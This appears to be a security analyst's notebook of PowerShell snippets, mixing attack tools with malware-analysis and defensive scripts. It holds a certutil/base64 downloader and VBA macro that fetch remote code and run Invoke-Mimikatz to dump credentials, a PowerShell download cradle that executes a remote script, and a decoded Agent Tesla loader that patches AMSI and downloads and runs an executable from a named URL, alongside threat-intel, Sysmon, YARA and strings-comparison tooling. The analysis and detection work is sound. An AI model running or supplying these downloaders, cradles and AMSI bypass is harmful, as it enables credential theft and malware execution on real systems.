downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz

certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string);

Invoke-Mimikatz -DumpCreds

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")

Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")

Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")

Agent Tesla , Doc => Powershell => C# => EXE => SMTP

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

function funcDecodeNetClassSourceCode {
 param($paramEncodedNetClassSourceCode)
 $xorKey='s7c5f8';
 $varDecodedNetClassSourceCode='';
 for ($i=0; $i -lt $paramEncodedNetClassSourceCode.length; $i+=2){
  $varEncodedHexBytes=[convert]::ToByte($paramEncodedNetClassSourceCode.Substring($i,2),16);
  $varDecodedChar=[char]($varEncodedHexBytes -bxor $xorKey[($i/2)%$xorKey.length]);
  # write-host ("Encoded: {0} , Decoded: {1}" -f ($varEncodedHexBytes, $varDecodedChar)) # watch every character get xor decoded
  $varDecodedNetClassSourceCode+=$varDecodedChar
 }
 return $varDecodedNetClassSourceCode;
}
$varEncodedNetClassSourceCode = '06440a5b0118204e104103554842105c085f53641a46125d1e193140084c1a5a061b2f560752115a166b1645155c055d000c16460f561417304c154c165a4d710f5914590c4612511044584015511d5043661f4b07520e1b2f774842105c085f53641a46125d1e192d5012037e3d134004541a5443560a590044434c05014700054e3d7c1f5b2a58165701434b170d5d01590659550a511b265b124a0a670c5c084c4e152450126801580074025c0152104644112e4716570a5110171041074c1a5443501e4c16450d152f5607671747465d460e540105103a591765124a5352060005005f4417470f5614171756500d110f071c5d63375b0f7c0b481c45171d445316450d500a0b41154f70084c014e335a0f56070a41790959177b0a571459014e411c3b4806550f5c0518004302410f5b53521b41034a1d172a5b1268074543475f5d150e551d154c015e0d52464f42535b065e11486c27590a711e470c471210515c0647085d1f0451174a7d1d43114c36571a591708446e1a451740075423450c41035b07154a68164d115b0a56464b0756175c0518164f1750145653550c5a0a1802015a0754595b7e0d41364c01171206525b1704561933711d433341141817565a54505e421b165c084c53515753505b5f581641464d1a591715035d120507544f0328730f592f55035811414e1a3852115b035440054d510a54511b265b124a0a670c5c084c4e1531410a751c41067803551c451a174a6b16432f54154c3645115a140515560f4603112e44175412511017064d125d015943430951171712545e0f4403001d2f560767174746504b550751050e5f7e0d41364c01170000055c121b0a5b121809555b045500171e5845135a1f5e0015154c12430a5646511d43435b000b4456021d4f433a591765124a535d0500570c4e455a500001451f1407040d16524b17570a46565205535b470f5656575e4655411c4f031a514b5f000d420342082f5607671747486216450c1c1d711d43334114181d00540c050516025a02525b5b5d0500570c5f405157535d161f4106540d12065300050b46020104540d4a055201560843020604500c46154a1c5d51151f0d02510110165e7c084c2343111b3c5d01584a4e33711d43334114180253000253055b622a5b126807454a005d4d1a591715175b465157025b08485e051d170e4a0551544e5644005a564a49175454004a080b035319094d07171256535e47004a1c1d7a0a43066e3b18100f0756070508071b065714434f05534a080b0e53485d711d4333411418160f550602053e5611460e591f1922590a57107f2459095a125b4b064f033e5611460e591f19205a16415b545b5105595f074f505e0e40534f064f0302565b02510c101f0d5011183a591765124a5b5954025f5b5d630c7c084c45034b1c4d080b07530404115f525b03555c5f044a0e1b450e4417470f5614171057500b440a265b105101580d58035607192450127e1c5b0750146812430b1d2356055e115a08551659171b354816540a540a7e1c5b07501416324713590f5b12430a5a087c1243021c461353153f69005c400e50575e1a531c4342545a4652061d440d17025104040d43154a0e085d04173450047b1f5e065b12105a19275a11561f58025120511f524b42545a4652061d440911035004510c46020004510d10025204500d41070501050944025105540d45075401040941065a04570d12035a01000840060205560d12075b01050945025a045109120650015e0947035605540d42075004510946020605000d43065604510910025605070911075001560945154a19155a4504541c5d6801580050154b2043024712711d510c151e5b11020508085d04173347095b16441066125901432a5b00575b440103550f5a0c3347095b1644101b354c1245171d1e5b1102051c5d4a164316470818430c1e45135a1f5e0015154c12430a56464b07450a5b011804050100035d5b4417470f56141717505f5b411e1846124a1a590415035d46545b08444b445456535e1a484417470f561417110c035e4a015e1744031558111d0f5607170a085603535e5f41030110054d79035614430b0e0f134e054a4e04410752435053014403000825571d41064712162758214c125d5b43060c050a5d641657154c015e0d524e515f054a19570e5a0c110c035e4a0148084e5b1b56111c4e5d460e54010566165256565e635b5e4c074f1d165256565e163f520d5212502e1e5848145d0742115b464a4a52050c50030e4a';
$varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode);
write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode)
# Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session
# [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class



---------------------
Results
---------------------
Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N
et;
public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string
 tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne
l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da)
;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5
cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77
9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692
2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863
d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder.
ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b
1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn
fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for
(int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le
ngth]);}return r9ef96;}}

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
# [yc947f]::nf37aa() # malicious entry point
public class yc947f{
 [DllImport("kernel32",EntryPoint="GetProcAddress")]
 public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName);
 
 [DllImport("kernel32",EntryPoint="LoadLibrary")]
 public static extern IntPtr funcKernel32LoadLibrary(string paramDllName);

 [DllImport("kernel32",EntryPoint="VirtualProtect")]
 public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue);
 
 [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]
 static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes);

 public static int nf37aa(){
  # malicious entry point, patching AMSI Dll and a C# downloader
  string varDllName = funcDecodeString("125a105c485c1f5b");
  Console.WriteLine(String.Format("Dll: {0}", varDllName));
  IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName);
  if(varHandleToDll!=IntPtr.Zero){
   string varFunctionName = funcDecodeString("325a105c355b12592140005e1645");
   Console.WriteLine(String.Format("Function: {0}", varFunctionName));
   IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName);
   if(varHandleToFunction!=IntPtr.Zero){
    UIntPtr varMemorySize=(UIntPtr)5;
    uint varOldProtectValue=0;
    if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){
     Byte[] var3BytesToCopy={0x31,0xff,0x90};
     IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3);
     Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3);
     # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function
    }
   }
  }
  string varFileName = funcDecodeString("5d521b50");
  Console.WriteLine(String.Format("File: {0}", varFileName));
  string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName;
  Console.WriteLine(String.Format("Path: {0}", varFileFullPath));
  string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016");
  Console.WriteLine(String.Format("Url: {0}", varUrl));
  new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware
  ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath);
  # Process.Start(varProcessToRun); # run the malware
  return 0;
 }
 public static string funcDecodeString(string paramEncodedString){
  string varXorKey="s7c5f8";
  string varDecodedString="";
  for (int i=0; i<paramEncodedString.Length; i+=2){
   byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16);
   varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]);
  }
  return varDecodedString;
 }
}

Dll: amsi.dll
Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe
Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe

Agent Tesla

c2 terminal6.veeblehosting.com
tcp port 587

https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community

agent tesla
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE

smtp

port 587

"terminal6.veeblehosting.com"
"obi@a-t-mould.com"
{obi@a-t-mould.com}
{obi@a-t-mould.com}

Script Query UrlHaus , OpenPhish, PhishTank and Extract Dns, IPs for Threat Intel Feed

code to pull dns & ips from urlhaus, openphish, phishtank, etc.


#usage: iex (get-content .\GetData.ps1 | out-string) > output.txt
$debug = $true
$fileOutput = "dns.csv"
$fileIpOutput = "ip.csv"
$ignoreList = @("google.com", "www.google.com", "urlhaus.abuse.ch", "pastebin.com", "ak.imgfarm.com", "docs.google.com", "drive.google.com", "i.imgur.com", "img.sobot.com", "imgur.com", "www.imgur.com", "raw.githubusercontent.com", "github.com", "www.github.com", "adobe.com", "www.adobe.com", "ibm.com", "www.ibm.com", "dell.com", "www.dell.com", "bing.com", "www.bing.com", "msn.com", "www.msn.com", "documentcloud.adobe.com", "cisco.com", "www.cisco.com",  "l.yimg.com", "yimg.com", "dl.dropboxusercontent.com", "dropbox.com", "www.dropbox.com", "godaddy.com", "godaddysites.com", "files.constantcontact.com", "ipinfo.io", "bit.ly", "onedrive.live.com", "000webhostapp.com", "storage.googleapis.com", "wikileaks.org", "forms.gle", "go2l.ink", "capesandbox.com", "twitter.com", "paste.cryptolaemus.com", "cryptolaemus.com", "gist.githubusercontent.com", "bitbucket.org", "img1.wsimg.com", "cdn.discordapp.com", "web.mit.edu", "bit.do", "na3.docusign.net", "sway.office.com", "sites.google.com", "aka.ms", "login.microsoftonline.com", "track.smtpsendmail.com", "r20.rs6.net", "files.gamebanana.com", "sems.sas.com", "www.avast.com", "1.0.0.0", "bitly.com", "instagram.com", "www.instagram.com", "1.2.0.1073", "2016.3.3.0332", "3.0.0.2013", "31.128.173.853", "4.8.0.904", "cdn.speedof.me", "codeload.github.com", "tr.im", "urlz.fr", "accounts.google.com", "t.co", "fls.doubleclick.net", "1359940.fls.doubleclick.net", "rebrand.ly", "23.4.43.27", "app.smartsheet.com", "forms.office.com", "api.whatsapp.com", "form.jotform.com", "tinyurl.com", "firebasestorage.googleapis.com", "www.google.com.au", "go.pardot.com", "goo.gl", "click.icptrack.com", "online.jimmyjohns.com", "feeds.feedburner.com", "www.google.co.uk", "event.on24.com", "www.powr.io", "protect-us.mimecast.com", "visitor.constantcontact.com", "www.questionpro.com", "click.pstmrk.it", "code.jivosite.com", "apple.co", "www.google.com.mx", "linktr.ee", "www.vcita.com", "www.evernote.com", "www.123formbuilder.com", "tiny.cc", "app.box.com", "script.google.com", "disq.us", "click.email.microsoftemail.com", "fiddle.jshell.net", "cache.nebula.phx3.secureserver.net", "lnkd.in", "www.magazineluiza.com.br", "share.hsforms.com", "fbwat.ch", "app.dialoginsight.com", "cl.s10.exct.net", "etrack05.com", "www.alaskausa.org", "vk.com", "storage.cloud.google.com", "1drv.ms", "www.imcreator.com", "172.217.21.162", "sinacloud.net", "tinyurl.com", "is.gd", "note.youdao.com", "www.surveygizmo.com", "www.tinyurl.com", "surveygizmo.com", "ow.ly", "www.eater.com", "eater.com", "www.stats.gov.cn", "stats.gov.cn", "buff.ly", "www.angelfire.com", "epl.paypal-communication.com", "forms.zohopublic.com", "objectstorage.us-ashburn-1.oraclecloud.com", "t.yesware.com", "snip.ly", "cutt.ly", "mysurveygizmo.com", "www.mysurveygizmo.com", "gitlab.com", "ht.ly", "teamapp.com", "chat.chatra.io", "id.ee.co.uk", "paste.ee","youtube.com","www.youtube.com","play.google.com","google.com.br","docsend.com","www.google.com.br","www.emailmeform.com","emailmeform.com","web.facebook.com","upload.facebook.com","te.bathandbodyworks.com","tatatechnologies.workplace.com","statis.facebook.com","protect-eu.mimecast.com","notion.so","mtouch.facebook.com","messenger.com","j.mp","images2.imgbox.com","graph.facebook.com","fbthirdpartypixel.com","es-la.facebook.com","error.facebook.com","email.secureserver.net","edge-chat.workplace.com","edge-chat.facebook.com","deref-gmx.net","cs.atdmt.com","click.mail.onedrive.com","ca.surveygizmo.com","business.facebook.com","badge.facebook.com","apps.facebook.com","api.facebook.com","an.facebook.com","about.instagram.com","yadi.sk", "157.240.2.20", "www.notion.so","static.facebook.com","www.login-bank.org", "ctt.ec", "www.teamapp.com", "t.umblr.com", "upscri.be", "www.imeipro.info", "imeipro.info", "wisegeek.com", "deref-mail.com", "app.getaccept.com", "cdn2.hubspot.net", "slack-redir.net", "www.wisegeek.com", "chime.com", "www.chime.com", "b.link" , "hyperurl.co", "s3.ap-south-1.amazonaws.com", "podio.com", "s3-us-west-2.amazonaws.com", "tfaforms.com", "www.tfaforms.com", "webservice99.com", "mediafire.com", "www.mediafire.com", "smarturl.it","s3.us-east-1.amazonaws.com","www.restaurantdive.com" ,"rawcdn.githack.com"","https","http","ttp","ttps","lasvegas.craigslist.org","clicktime.symantec.com","survey.survicate.com","t.me","clicktotweet.com", "www.wetransfer.com", "wetransfer.com", "www.geocities.ws", "geocities.ws", "wa.me", "email.godaddy.com", "emailmarketing.locaweb.com.br", "dlvr.it", "www.sendspace.com", "v.ht", "52.109.124.1", "static.wixstatic.com","docs.wixstatic.com","image.prntscr.com,"d1yjjnpx0p53s8.cloudfront.net", "canva.com", "articulo.mercadolibre.com.mx", "e-mudhra.com", "www.canva.com", "listado.mercadolibre.com.mx")
#$urlIntelThem = "https://openphish.com/feed.txt"
#$urlIntelThem = "https://data.phishtank.com/data/online-valid.csv"
#$urlIntelThem = "https://phishstats.info/phish_score.txt"
#$urlIntelThem = "https://urlhaus.abuse.ch/downloads/csv/"
#$urlIntelThem = "https://urlhaus.abuse.ch/downloads/csv_recent/"
$urlIntelThem = "https://urlhaus.abuse.ch/downloads/csv_online/"
$rawHttpThem = ""
$rawIntelThem = ""
$dnsList = ""
$ipList = ""
$first = 0
if($debug){ Write-Output ("Requesting '{0}'" -f $urlIntelThem) }
$httpResponseThem = Invoke-WebRequest -UseDefaultCredentials $urlIntelThem
$rawHttpThem = $httpResponseThem.RawContent
if($debug){ Write-Output ("Downloaded '{0}'" -f $urlIntelThem) }
if($rawHttpThem.IndexOf("abuse.ch") -gt 0){
$rawIntelThem = $rawHttpThem.SubString($rawHttpThem.LastIndexOf("# ")+2)
}elseif($rawHttpThem.IndexOf("PhishStats") -gt 0){
$rawIntelThem = "date,score,url,ip`r`n{0}" -f $rawHttpThem.SubString($rawHttpThem.LastIndexOf("# ")+2)
}elseif($rawHttpThem.IndexOf("phish_id") -gt 0){
$rawIntelThem = $rawHttpThem.SubString($rawHttpThem.IndexOf("phish_id"))
}else{
$first = $rawHttpThem.IndexOf("http")
$rawIntelThem = "url`r`n{0}" -f $rawHttpThem.SubString($first)
}
$csvThemIntel = ConvertFrom-Csv $rawIntelThem
$outputList = @()
$outputIpList = @()
$savedCount = 0
$savedIpCount = 0
$ignoredCount = 0
foreach($rowIntelThem in $csvThemIntel){
try {
$domainThem = ([System.Uri]::new($rowIntelThem.url).Host).ToString()
$ignoreIt = 0
foreach($ignoredItem in $ignoreList){
if($domainThem.ToLower() -eq $ignoredItem.ToLower()){
$ignoreIt = 1
$ignoredCount = $ignoredCount +1
break
}
}
if($ignoreIt -eq 0){
$ipThem = [IPAddress] $domainThem
$newHit = New-Object PSObject
$newHit | add-member Noteproperty ip $ipThem
$outputIpList += $newHit
$savedIpCount = $savedIpCount + 1
}
}
catch{
if($domainThem.ToLower().StartsWith("www.")){
#double count it (www.ebay.com and ebay.com)
$newHit = New-Object PSObject
$newHit | add-member Noteproperty dns $domainThem.SubString(4)
$outputList += $newHit
$savedCount = $savedCount + 1
}
$newHit = New-Object PSObject
$newHit | add-member Noteproperty dns $domainThem
$outputList += $newHit
$savedCount = $savedCount + 1
}
}
if($debug){ Write-Output ("Exporting '{0}'" -f $fileOutput) }
$outputList | Export-Csv -NoTypeInformation -Path $fileOutput
if($debug){ Write-Output ("Saved '{0}'" -f $fileOutput) }
if($debug){ Write-Output ("Exporting '{0}'" -f $fileIpOutput) }
$outputIpList | Export-Csv -NoTypeInformation -Path $fileIpOutput
if($debug){ Write-Output ("Saved '{0}'" -f $fileIpOutput) }
if($debug){ Write-Output ("Dns='{0}', Ips='{1}', Ignored='{2}'" -f $savedCount, $savedIpCount, $ignoredCount) }
if($debug){
foreach($dns in $outputList){
if($dnsList -eq ""){
$dnsList = $dns.dns
}else{
$dnsList = "{0},{1}" -f $dnsList , $dns.dns
}
}
foreach($ip in $outputIpList){
if($ipList -eq ""){
$ipList = $ip.ip
}else{
$ipList = "{0},{1}" -f $ipList , $ip.ip
}
}
Write-Output $dnsList
Write-Output $ipList
}

Query Sysmon Logs using Powershell Get-WinEvent

get-winevent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=1} | select Message |foreach-object {$a = $_.Message.split([Environment]::NewLine); ""; foreach ($a2 in $a) {$b = $a2.split(':',2); $key = $b[0]; $value = $b[1]; if($key -eq "CommandLine" -or $key -eq "ParentCommandLine"){"{0}={1}" -f ($key,$value)}}}


sample output

CommandLine= sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-update-git-for-windows" --quiet --gui
ParentCommandLine= git.exe update-git-for-windows --quiet --gui

CommandLine= git.exe update-git-for-windows --quiet --gui
ParentCommandLine= cmd\git.exe update-git-for-windows --quiet --gui

CommandLine= cmd\git.exe update-git-for-windows --quiet --gui
ParentCommandLine= "C:\Program Files\Git\git-bash.exe" --hide --no-needs-console --command=cmd\git.exe update-git-for-windows --quiet --gui

CommandLine= "C:\Program Files\Git\git-bash.exe" --hide --no-needs-console --command=cmd\git.exe update-git-for-windows --quiet --gui
ParentCommandLine= C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule

Wmic List all Processes, sort in powershell

$processes = wmic.exe process list |foreach-object {$k = $_ -split '\s+';foreach($i in $k){if($i -notmatch "\\" -and $i.endswith(".exe")){$i.tolower()}}} |sort-object|get-unique

$processes

---------------
example output
---------------
adobearm.exe
aoservice.exe
apmsgfwd.exe
apntex.exe
apoint.exe
applicationframehost.exe
... more ...




---------------
example output
---------------
$processpaths = wmic.exe process list |foreach-object {$k = $_ -split '\s+';foreach($i in $k){if($i -notmatch "\\" -and $i.endswith(".exe")){$i.tolower()}}} |sort-object|get-unique|foreach-object{get-process -name ($_ -replace ".{4}$") | select path} |foreach-object {$_.path.tolower()} |get-unique

$processpaths

---------------
example output
---------------
c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe
c:\program files\citrix\secure access client\aoservice.exe
c:\windows\system32\delltpad\apmsgfwd.exe
c:\windows\system32\delltpad\apntex.exe
c:\windows\system32\delltpad\apoint.exe
c:\windows\system32\applicationframehost.exe
c:\windows\system32\delltpad\apremote.exe
... more ...

Use Powershell to Run Yara against entire Folder of Malware

# run "myrules.yar" against all *.bin files in a folder and print to standard output
get-childitem \ -filter *.bin |select fullname|foreach-object {$cmd ="&./yara64.exe myrules.yar "+ $_.fullname + " -s"; iex $cmd }

---------

run yara against all malware files in a folder

---------
sample output
---------
MindsparkToolbar \EasyPDFCombine.bin
0x4a34e:$eula: http://eula.mindspark.com/ask/0
0x4b2e6:$eula: http://eula.mindspark.com/ask/0
0xae8c:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xafca:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xb090:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
MindsparkToolbar \EverydayLookup.bin
0x5c276:$eula: http://eula.mindspark.com/ask/0
0x5d20e:$eula: http://eula.mindspark.com/ask/0
0xc414:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xc55a:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xc620:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
MindsparkToolbar \FromDocToPdf.bin
0x5fbce:$eula: http://eula.mindspark.com/ask/0
0x60b69:$eula: http://eula.mindspark.com/ask/0
0x5f05f:$publisher: Mindspark Interactive Network, Inc.
0x5f08d:$publisher: Mindspark Interactive Network, Inc.
0x600be:$publisher: Mindspark Interactive Network, Inc.
0x600ec:$publisher: Mindspark Interactive Network, Inc.
0xae8c:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xafca:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xb090:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
error: could not open file: \Internet
MindsparkToolbar \YourTemplateFinder.bin
0x5b498:$eula: http://eula.mindspark.com/ask/0
0x5c43a:$eula: http://eula.mindspark.com/ask/0
0xae8c:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xafe2:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xb0a8:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00

Compare Malware Strings of Multiple Files for Matches

# run strings on all malware *.bin files in the directory and output strings to .bin.txt files
get-childitem \ -filter *.bin |select name,fullname|foreach-object {$cmd = "/c strings64.exe -n 8 `""+$_.fullname +"`" > `""+$_.name+".txt`""; start-process -filepath "cmd.exe" -argumentlist $cmd}

# compare every .bin.txt files and return only strings that are in ALL of them
$counter=0; $matches = @(); $lines1 = @(); get-childitem \ -filter *.bin.txt |select name,fullname|foreach-object {if($counter -eq 0){$counter++; $lines1=get-content  -path $_.fullname; $lines1=$lines1|sort;}else{$matches=@();$counter++;$lines2=get-content -path $_.fullname;$lines2=$lines2|sort;foreach($str in $lines1){if($lines2 -contains $str) {$matches += $str}};$lines1=$matches;}};$matches|get-unique

-----------
find matches in multiple malware files
find matches in multiple lists
find matches in multiple arrays

-----------------
Sample output
-----------------
!This program cannot be run in DOS mode.
CloseHandle
GetCurrentProcess
GetProcAddress
KERNEL32.dll
USER32.dll

Compare Malware Strings of 2 Files for Matches

# run strings on both malware samples
strings64.exe -n 8 malware1.exe > str1.txt
strings64.exe -n 8  malware2.exe > str2.txt

# put the results into 2 arrays
[string []] $lines1 = Get-Content -Path str1.txt
[string []] $lines2 = Get-Content -Path str2.txt

# sort the arrays
$lines1 = $lines1 |sort
$lines2 = $lines2 |sort

# find matches in the 2 lists
$matches = @()
foreach ($str in $lines1) {if($lines2 -contains $str) {$matches += $str}}
$matches|get-unique


-----------
find matches in 2 arrays
find matches in 2 lists
find lines in 2 files
find lines in 2 arrays
compare 2 malware strings
compare 2 files
compare 2 arrays


-----------------
Sample output
-----------------
!This program cannot be run in DOS mode.
#+3;CScs
#http://crl.verisign.com/pca3-g5.crl04
#http://logo.verisign.com/vslogo.gif04
%u.%u%s%s
%VeriSign Class 3 Code Signing 2010 CA
%VeriSign Class 3 Code Signing 2010 CA0
%VeriSign Class 3 Code Signing 2010 CA0
*?|<>/":
... %d%%
.DEFAULT\Control Panel\International
.http://crl.thawte.com/ThawteTimestampingCA.crl0
@sS\-Z?G
[Rename]
\Microsoft\Internet Explorer\Quick Launch
~nsu.tmp
+http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
+http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(



-----------------

from linux try this

------------------

strings 1.bin | sort > output1.txt

strings 2.bin | sort > output2.txt

comm -12 output1.txt output2.txt > same.txt

Powershell download cradle

sample download cradle in conjuction with python -m SimpleHTTPServer 80

powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"

Powershell split and sort

In powershell if you have a ugly string like the environment path


PS c:\> $env:PATH

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\Microsoft VS Code\bin


you can quickly split it out and make it pretty like this

PS c:\> $env:PATH -Split ";" | Sort-Object -Unique

C:\Program Files (x86)\IBM\Client Access\
C:\Program Files\Microsoft VS Code\bin
C:\Program Files\PuTTY\
C:\WINDOWS
C:\WINDOWS\system32
C:\WINDOWS\System32\OpenSSH\
C:\WINDOWS\System32\Wbem
C:\WINDOWS\System32\WindowsPowerShell\v1.0\

Powershell listening on a port

$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
